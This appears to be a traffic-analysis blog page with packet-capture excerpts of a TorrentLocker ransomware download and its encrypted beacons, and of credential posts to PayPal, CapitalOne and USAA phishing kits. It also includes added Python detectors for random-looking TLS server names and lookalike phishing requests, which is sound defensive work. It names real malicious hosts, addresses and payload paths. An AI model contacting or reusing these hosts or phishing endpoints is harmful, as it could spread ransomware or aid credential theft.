Ransomware Torrentlocker TOR Malware Crimeware Botnet PCAP file download traffic sample oft.gfd

SHA256: 9c1b8dc277ae7c75a446a9ffb2d6eb05da48e27d699f095dd3838180b54d0459
File name: oft.gfd
Detection ratio: 32 / 57
Analysis date: 2017-04-26 02:03:42 UTC
Engine                    Result                                          Update
ESET-NOD32                Win32/Filecoder.TorrentLocker.A                 20170425
Baidu                     Win32.Trojan.WisdomEyes.16070401.9500.9984      20170424
GData                     Win32.Trojan.Agent.84RAT9                       20170425
Cyren                     W32/Trojan.TNFL-3209                            20170425
Fortinet                  W32/Injector.DOCE!tr                            20170425
Comodo                    UnclassifiedMalware                             20170425
Kaspersky                 UDS:DangerousObject.Multi.Generic               20170425
ZoneAlarm by Check Point  UDS:DangerousObject.Multi.Generic               20170425
AegisLab                  Uds.Dangerousobject.Multi!c                     20170425
Invincea                  trojan.win32.skeeyah.a!rfn                      20170413
AVware                    Trojan.Win32.Generic!BT                         20170425
VIPRE                     Trojan.Win32.Generic!BT                         20170425
F-Secure                  Trojan.GenericKD.4930825                        20170425
Emsisoft                  Trojan.GenericKD.4929489 (B)                    20170425
Ad-Aware                  Trojan.GenericKD.4929489                        20170425
BitDefender               Trojan.GenericKD.4929489                        20170425
eScan                     Trojan.GenericKD.4929489                        20170425
Arcabit                   Trojan.Generic.D4B37D1                          20170425
Qihoo-360                 Trojan.Generic                                  20170426
Panda                     Trj/RansomCrypt.E                               20170424

2017-04-25 21:29:09.776867 IP 192.168.1.102.63089 > 193.233.60.122.80: Flags [.], ack 2711491197, win 256, length 0
2017-04-25 21:29:09.782018 IP 192.168.1.102.63089 > 193.233.60.122.80: Flags [P.], seq 0:285, ack 1, win 256, length 285: HTTP: GET /file/oft.gfd HTTP/1.1
GET /file/oft.gfd HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: costfer.pl
Connection: Keep-Alive
2017-04-25 21:29:58.373426 IP 192.168.1.102.63090 > 31.31.76.169.443: Flags [S], seq 927389296, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-04-25 21:29:58.502366 IP 192.168.1.102.63090 > 31.31.76.169.443: Flags [.], ack 847962573, win 256, length 0
2017-04-25 21:29:58.503090 IP 192.168.1.102.63090 > 31.31.76.169.443: Flags [P.], seq 0:101, ack 1, win 256, length 101
TLS ClientHello, server_name (SNI): www.6i8oni0h17kj6ab3.com

2017-04-25 21:30:37.138220 IP 192.168.1.102.63094 > 5.12.153.81.80: Flags [P.], seq 0:79, ack 1, win 64952, length 79: HTTP: GET /plain HTTP/1.1
GET /plain HTTP/1.1
Accept: */*
Host: ipecho.net
Cache-Control: no-cache

2017-04-25 21:30:37.359215 IP 192.168.1.102.63094 > 5.12.153.81.80: Flags [.], ack 246, win 64707, length 0
2017-04-25 21:30:38.162461 IP 192.168.1.102.63089 > 193.233.60.122.80: Flags [F.], seq 570, ack 821334, win 3963, length 0
2017-04-25 21:30:59.837934 IP 192.168.1.102.63095 > 208.83.223.34.80: Flags [S], seq 1480060622, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-04-25 21:30:59.930355 IP 192.168.1.102.63095 > 208.83.223.34.80: Flags [.], ack 1970375308, win 256, length 0
2017-04-25 21:30:59.930885 IP 192.168.1.102.63095 > 208.83.223.34.80: Flags [P.], seq 0:99, ack 1, win 256, length 99: HTTP
TLS ClientHello on port 80, server_name (SNI): www.a8k57b0dj9j4me.com

2017-04-25 21:31:07.334094 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [S], seq 2222676753, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-04-25 21:31:07.423242 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [.], ack 423700117, win 256, length 0
2017-04-25 21:31:07.423774 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [P.], seq 0:100, ack 1, win 256, length 100
TLS ClientHello on port 9090, server_name (SNI): www.neoc27io5cf1ian.com
2017-04-25 21:31:07.516179 IP 192.168.1.102.63096 > 209.141.47.169.9090: Flags [.], ack 9, win 256, length 0
2017-04-25 21:31:12.515250 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [S], seq 176368332, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-04-25 21:31:12.621598 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [.], ack 2263376506, win 256, length 0
2017-04-25 21:31:12.622117 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [P.], seq 0:93, ack 1, win 256, length 93
TLS ClientHello, server_name (SNI): www.1aaf7d6d.com
2017-04-25 21:31:12.878200 IP 192.168.1.102.63097 > 212.47.241.21.443: Flags [.], ack 9, win 256, length 0
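The capture above shows three things worth alerting on: the payload fetched over plain HTTP (GET /file/oft.gfd from costfer.pl with an MSIE 8 User-Agent), an external-IP lookup against ipecho.net, and a run of TLS ClientHellos to hosts on ports 443, 9090 and even 80 whose server_name is a www.<random>.com label. The following Python script is an added example, not code from the original post: it parses a ClientHello record, extracts the server_name extension, and flags random-looking www.*.com labels regardless of destination port. The ClientHello builder, the sample flows and the regular-expression heuristic (a www.<8 to 20 lowercase alphanumerics>.com label mixing letters and digits) are this example's own assumptions; the SNI strings and destination addresses are the ones seen in the capture.

```python
import re
import struct


# Constructed sample, not bytes from the capture on this page: a minimal
# TLS 1.0 ClientHello carrying only a server_name extension, built so the
# parser below can be exercised offline.
def build_client_hello(sni: str) -> bytes:
    host = sni.encode("ascii")
    name_entry = b"\x00" + struct.pack("!H", len(host)) + host      # name type 0 = host_name
    sni_data = struct.pack("!H", len(name_entry)) + name_entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_data)) + sni_data  # extension type 0 = SNI
    extensions = struct.pack("!H", len(sni_ext)) + sni_ext
    body = (
        b"\x03\x01"                      # client_version TLS 1.0
        + b"\x00" * 32                   # random (zeroed in this sample)
        + b"\x00"                        # session_id length 0
        + b"\x00\x04\x00\x2f\x00\x35"    # two cipher suites (AES128-SHA, AES256-SHA)
        + b"\x01\x00"                    # one compression method: null
        + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # handshake type 1
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes):
    """Walk a TLS ClientHello record and return the server_name, or None.
    Every length field is bounds-checked so truncated or non-TLS payloads
    (an HTTP request, a partial segment) fall through to None."""
    if len(record) < 9 or record[0] != 0x16:
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        return None
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 2 + 32                                   # client_version + random
    if pos >= len(body):
        return None
    pos += 1 + body[pos]                           # session_id
    if pos + 2 > len(body):
        return None
    pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]   # cipher_suites
    if pos >= len(body):
        return None
    pos += 1 + body[pos]                           # compression_methods
    if pos + 2 > len(body):
        return None                                # no extensions block at all
    ext_end = min(pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0], len(body))
    pos += 2
    while pos + 4 <= ext_end:
        etype, elen = struct.unpack("!HH", body[pos:pos + 4])
        edata = body[pos + 4:pos + 4 + elen]
        pos += 4 + elen
        if etype != 0x0000:
            continue
        p = 2                                      # skip server_name_list length
        while p + 3 <= len(edata):
            ntype, nlen = edata[p], struct.unpack("!H", edata[p + 1:p + 3])[0]
            if ntype == 0 and p + 3 + nlen <= len(edata):
                return edata[p + 3:p + 3 + nlen].decode("ascii", "replace")
            p += 3 + nlen
    return None


# Heuristic (an assumption of this example, not a rule stated on the page):
# a www.<8-20 lowercase alphanumerics>.com label that mixes letters and digits.
RANDOM_SNI = re.compile(r"^www\.[a-z0-9]{8,20}\.com$")


def looks_like_random_sni(name) -> bool:
    if not name or not RANDOM_SNI.match(name):
        return False
    label = name.split(".")[1]
    return any(c.isdigit() for c in label) and any(c.isalpha() for c in label)


def scan_flows(flows):
    """flows: iterable of (dst_ip, dst_port, first_client_payload).
    Returns (dst_ip, dst_port, sni) for every flow whose ClientHello SNI
    matches the random-label heuristic, whatever the destination port."""
    hits = []
    for dst, port, payload in flows:
        sni = extract_sni(payload)
        if looks_like_random_sni(sni):
            hits.append((dst, port, sni))
    return hits


if __name__ == "__main__":
    # Constructed flows mirroring the destinations and SNIs seen in the capture.
    sample = [
        ("193.233.60.122", 80, b"GET /file/oft.gfd HTTP/1.1\r\nHost: costfer.pl\r\n\r\n"),
        ("31.31.76.169", 443, build_client_hello("www.6i8oni0h17kj6ab3.com")),
        ("208.83.223.34", 80, build_client_hello("www.a8k57b0dj9j4me.com")),
        ("209.141.47.169", 9090, build_client_hello("www.neoc27io5cf1ian.com")),
        ("212.47.241.21", 443, build_client_hello("www.1aaf7d6d.com")),
        ("203.0.113.10", 443, build_client_hello("www.paypal.com")),
    ]
    for hit in scan_flows(sample):
        print("random-looking SNI:", hit)
```

Keying the check on the SNI rather than on the destination port matters here because two of the four handshakes go to 9090 and 80, where a port-443-only TLS decoder would never look; the same parser can be fed the first client payload of every TCP stream from a PCAP.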

PayPal Phishing Scam Fake Website PCAP file download Traffic Sample

PayPal Phishing landing page:

Stealing Credentials Traffic:

2017-04-17 22:00:47.498090 IP 192.168.1.100.46042 > 184.154.127.226.80: Flags [P.], seq 1:785, ack 1, win 229, options [nop,nop,TS val 1037083633 ecr 3076619526], length 784: HTTP: POST /inc/login.php HTTP/1.1
POST /inc/login.php HTTP/1.1
Host: www.paypal.com4uswebappsresetaccountrecovery.timeseaways.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.paypal.com4uswebappsresetaccountrecovery.timeseaways.com/
Content-Length: 285
Connection: keep-alive

user=johnny5alive%40gmail.com&pass=johnny5alive&xBrowser=Mozilla+FireFox+v43&xOperatingSystem=Linux&xPlatForm=Desktop+Platform&xTimeZone=Mon+Apr+17+2017+22%3A00%3A35+GMT-0400+(EDT)&xResoLution=Computer%3A+1920×1080%3B+Browser+inner%3A+1920×762%3B+Browser+outer%3A+1920×1027&xLang=en-US
2017-04-17 22:00:47.557561 IP 184.154.127.226.80 > 192.168.1.100.46042: Flags [.], ack 785, win 239, options [nop,nop,TS val 3076619602 ecr 1037083633], length 0
2017-04-17 22:00:48.036469 IP 192.168.1.100.47166 > 52.22.15.101.443: Flags [.], ack 1, win 839, options [nop,nop,TS val 1037083768 ecr 547964563], length 0
2017-04-17 22:00:48.052170 IP 52.22.15.101.443 > 192.168.1.100.47166: Flags [.], ack 1, win 422, options [nop,nop,TS val 547967075 ecr 1037066196], length 0
2017-04-17 22:00:48.405903 IP 184.154.127.226.80 > 192.168.1.100.46042: Flags [P.], seq 1:369, ack 785, win 239, options [nop,nop,TS val 3076620452 ecr 1037083633], length 368: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Tue, 18 Apr 2017 01:59:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=63752465833b6cd873511e4cdeb8799e; path=/
Vary: User-Agent
Content-Length: 13
Connection: close
Content-Type: text/html

success_no_tl

CapitalOne Capital One Bank Auto Loans Phishing Campaign PCAP file download Traffic Analysis

Landing page:

Sample of posting credentials:

2017-04-17 21:57:05.598674 IP 192.168.1.100.41236 > 89.46.73.231.80: Flags [P.], seq 1:535, ack 1, win 229, options [nop,nop,TS val 1037028158 ecr 1270481385], length 534: HTTP: POST /CapitaLonE/SignIn/page/booting.php HTTP/1.1
POST /CapitaLonE/SignIn/page/booting.php HTTP/1.1
Host: 89.46.73.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://89.46.73.231/CapitaLonE/SignIn/page/
Cookie: PHPSESSID=aepqe8mcrenvcnj1utpej09oi2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

userId=johnny5&userPass=johnny5
2017-04-17 21:57:05.722090 IP 89.46.73.231.80 > 192.168.1.100.41236: Flags [.], ack 535, win 243, options [nop,nop,TS val 1270481511 ecr 1037028158], length 0
2017-04-17 21:57:06.135295 IP 89.46.73.231.80 > 192.168.1.100.41236: Flags [P.], seq 1:273, ack 535, win 243, options [nop,nop,TS val 1270481924 ecr 1037028158], length 272: HTTP: HTTP/1.1 302 Moved Temporarily
HTTP/1.1 302 Moved Temporarily
Date: Tue, 18 Apr 2017 01:55:28 GMT
Server: Apache/2.4.25 (Unix)
X-Powered-By: PHP/5.6.30
Location: ../page/index1.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

USAA Phishing Campaign PCAP File Download Traffic Analysis Sample

They do make the site look decent:

Here you can see the POST containing the fake information I entered:

2017-04-17 21:32:22.952265 IP 192.168.1.100.47366 > 78.135.65.3.80: Flags [.], seq 1:2849, ack 1, win 229, options [nop,nop,TS val 1036657496 ecr 1337509293], length 2848: HTTP: POST /wp-content/usa/account/logind.php HTTP/1.1
POST /wp-content/usa/account/logind.php HTTP/1.1
Host: www.lidergold.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.lidergold.com/wp-content/usa/account/USAA%20_%20Welcome%20to%20USAA.htm
Cookie: utag_main=v_id:015b7e84629b00a6d3faa895bd3001055005200900bd0$_sn:2$_ss:0$_st:1492480920811$_pn:3%3Bexp-session$ses_id:1492479023089%3Bexp-session; AMCV_47977B2A53A852210A490D45%40AdobeOrg=1999109931%7CMCMID%7C23146858886530304112860983349877067372%7CMCAAMLH-1493083927%7C7%7CMCAAMB-1493083927%7CNRX38WO0n5BH8Th-nqAG_A%7CMCAID%7CNONE%7CMCOPTOUT-1492479066.975%7CNONE; _ga=GA1.2.1621913373.1492479052; AMCVS_47977B2A53A852210A490D45%40AdobeOrg=1; s_pers=%20gpv_pn%3Dwww%257Cent%257Cent%257Cent%257Cn_a%257Cn_a%257Cpin%257Cpin_entry%7C1492480859711%3B%20s_nr%3D1492479059713-New%7C1495071059713%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dusaadev3%253D%252526c.%252526a.%252526activitymap.%252526page%25253Dwww%2525257Cent%2525257Cent%2525257Cent%2525257Cn_a%2525257Cn_a%2525257Cpin%2525257Cpin_entry%252526link%25253DNext%252526region%25253Dyui_3_3_0_4_149247905128121%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%252526pid%25253Dwww%2525257Cent%2525257Cent%2525257Cent%2525257Cn_a%2525257Cn_a%2525257Cpin%2525257Cpin_entry%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257B%2525257D%252526oidt%25253D2%252526ot%25253DSUBMIT%3B; aam_sc=aam%3D2056278%2Caam%3D2819030%2Caam%3D2819037%2Caam%3D3008635%2Caam%3D2940788%2Caam%3D2940810%2Caam%3D3546821%2Caam%3D3661938%2Caam%3D3661939%2Caam%3D2964854; fltk=segID%3D2453279%2CsegID%3D2090930; s_fid=01359BE61903FC17-3D6FFA8644830364; s_sq=usaadev3%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.lidergold.com%25252Fwp-content%25252Fusa%25252Faccount%25252FUSAA%25252520_%25252520Welcome%25252520to%25252520USAA.htm%2526oid%253DLog%252520On%2526oidt%253D3%2526ot%253DSUBMIT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1628

userid=pwnyou%40yourpwned.com&password=harharhar123&fp_syslang=&CSRFToken=778d07881ecc5398b4bd766ec1d697f5&fp_software=&fp_userlang=undefined&fp_display=24%7C1920%7C1080%7C1053&fp_lang=lang%3Den-US%7Csyslang%3D%7Cuserlang%3D&fp_timezone=-5&fp_browser=mozilla%2F5.0+%28×11%3B+linux+x86_64%3B+rv%3A43.0%29+gecko%2F20100101+firefox%2F43.0+iceweasel%2F43.0.4%7C5.0+%28X11%29%7CLinux+x86_64&risk_deviceprint=version%253D3%252E4%252E1%252E0%255F1%2526pm%255Ffpua%253Dmozilla%252F5%252E0%2520%2528×11%253B%2520linux%2520×86%255F64%253B%2520rv%253A43%252E0%2529%2520gecko%252F20100101%2520firefox%252F43%252E0%2520iceweasel%252F43%252E0%252E4%257C5%252E0%2520%2528X11%2529%257CLinux%2520×86%2
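The three kits above (PayPal, CapitalOne and USAA) share one pattern: the brand name is placed in the hostname, the URL path or the cloned page title, while the registrable domain the form actually posts to (timeseaways.com, a bare IP address, lidergold.com) belongs to someone else, and the credentials travel in cleartext over port 80 to a PHP handler. The following Python script is an added example, not code from any of the original posts: it parses such a request and scores it on those three signals, keeping only credential field names rather than their values so that the alert itself does not leak the captured password. The brand table, the two-label registrable-domain rule (no public-suffix list) and the constructed requests with fake credentials are assumptions of the example; the hosts and paths are the ones seen in the captures.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Assumption of this example: a tiny hard-coded brand table stands in for a
# real list of brands and the domains that legitimately host their logins.
BRANDS = {"paypal": "paypal.com", "capitalone": "capitalone.com", "usaa": "usaa.com"}

# Form field names that usually carry a credential (matched case-insensitively).
CRED_FIELD = re.compile(r"^(user(id|name)?|login|email|pass(word)?|userpass|pwd)$", re.I)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.decode("latin-1")


def registered_domain(host: str) -> str:
    """Registrable domain approximated as the last two labels. Assumption:
    no public-suffix list is consulted, so co.uk-style hosts are mis-split.
    IP literals (as in the CapitalOne kit) are returned unchanged."""
    host = host.split(":")[0].lower().rstrip(".")
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        labels = host.split(".")
        return ".".join(labels[-2:]) if len(labels) >= 2 else host


def brand_mentioned(*texts):
    """First brand keyword found in any of the texts; dots, dashes, underscores
    and slashes are stripped first so 'paypal.com4uswebapps...' still matches."""
    for text in texts:
        flat = re.sub(r"[.\-_/]", "", text.lower())
        for brand in BRANDS:
            if brand in flat:
                return brand
    return None


def analyze_request(raw: bytes, dst_port: int) -> dict:
    """Score one captured request for credential-phishing indicators.
    Field values are deliberately not retained, only the field names."""
    method, target, headers, body = parse_http_request(raw)
    host = headers.get("host", "")
    reg = registered_domain(host)
    brand = brand_mentioned(host, target, headers.get("referer", ""))
    fields = parse_qs(body, keep_blank_values=True) if method == "POST" else {}
    cred_fields = sorted(k for k in fields if CRED_FIELD.match(k))
    lookalike = brand is not None and reg != BRANDS[brand]
    return {
        "host": host,
        "registered_domain": reg,
        "brand": brand,
        "lookalike": lookalike,
        "cred_fields": cred_fields,
        "cleartext": dst_port != 443,
        "phish": lookalike and bool(cred_fields),
    }


# Constructed requests modelled on the three kits above, with fake test values.
PAYPAL_KIT = (
    b"POST /inc/login.php HTTP/1.1\r\n"
    b"Host: www.paypal.com4uswebappsresetaccountrecovery.timeseaways.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"user=victim%40example.com&pass=fakepass&xBrowser=Mozilla+FireFox+v43"
)
CAPITALONE_KIT = (
    b"POST /CapitaLonE/SignIn/page/booting.php HTTP/1.1\r\n"
    b"Host: 89.46.73.231\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"userId=victim&userPass=fakepass"
)
USAA_KIT = (
    b"POST /wp-content/usa/account/logind.php HTTP/1.1\r\n"
    b"Host: www.lidergold.com\r\n"
    b"Referer: http://www.lidergold.com/wp-content/usa/account/USAA%20_%20Welcome%20to%20USAA.htm\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"userid=victim%40example.com&password=fakepass&fp_timezone=-5"
)
LEGIT = (  # control case: the brand's own domain over TLS
    b"POST /signin HTTP/1.1\r\nHost: www.paypal.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"user=victim%40example.com&pass=fakepass"
)

if __name__ == "__main__":
    for name, raw, port in [("paypal", PAYPAL_KIT, 80), ("capitalone", CAPITALONE_KIT, 80),
                            ("usaa", USAA_KIT, 80), ("control", LEGIT, 443)]:
        print(name, analyze_request(raw, port))
```

The control case shows why the registrable domain, not the brand string, is the deciding signal: www.paypal.com also mentions the brand and also posts credential fields, but its registrable domain matches the brand table, so it scores as a lookalike only when the two disagree.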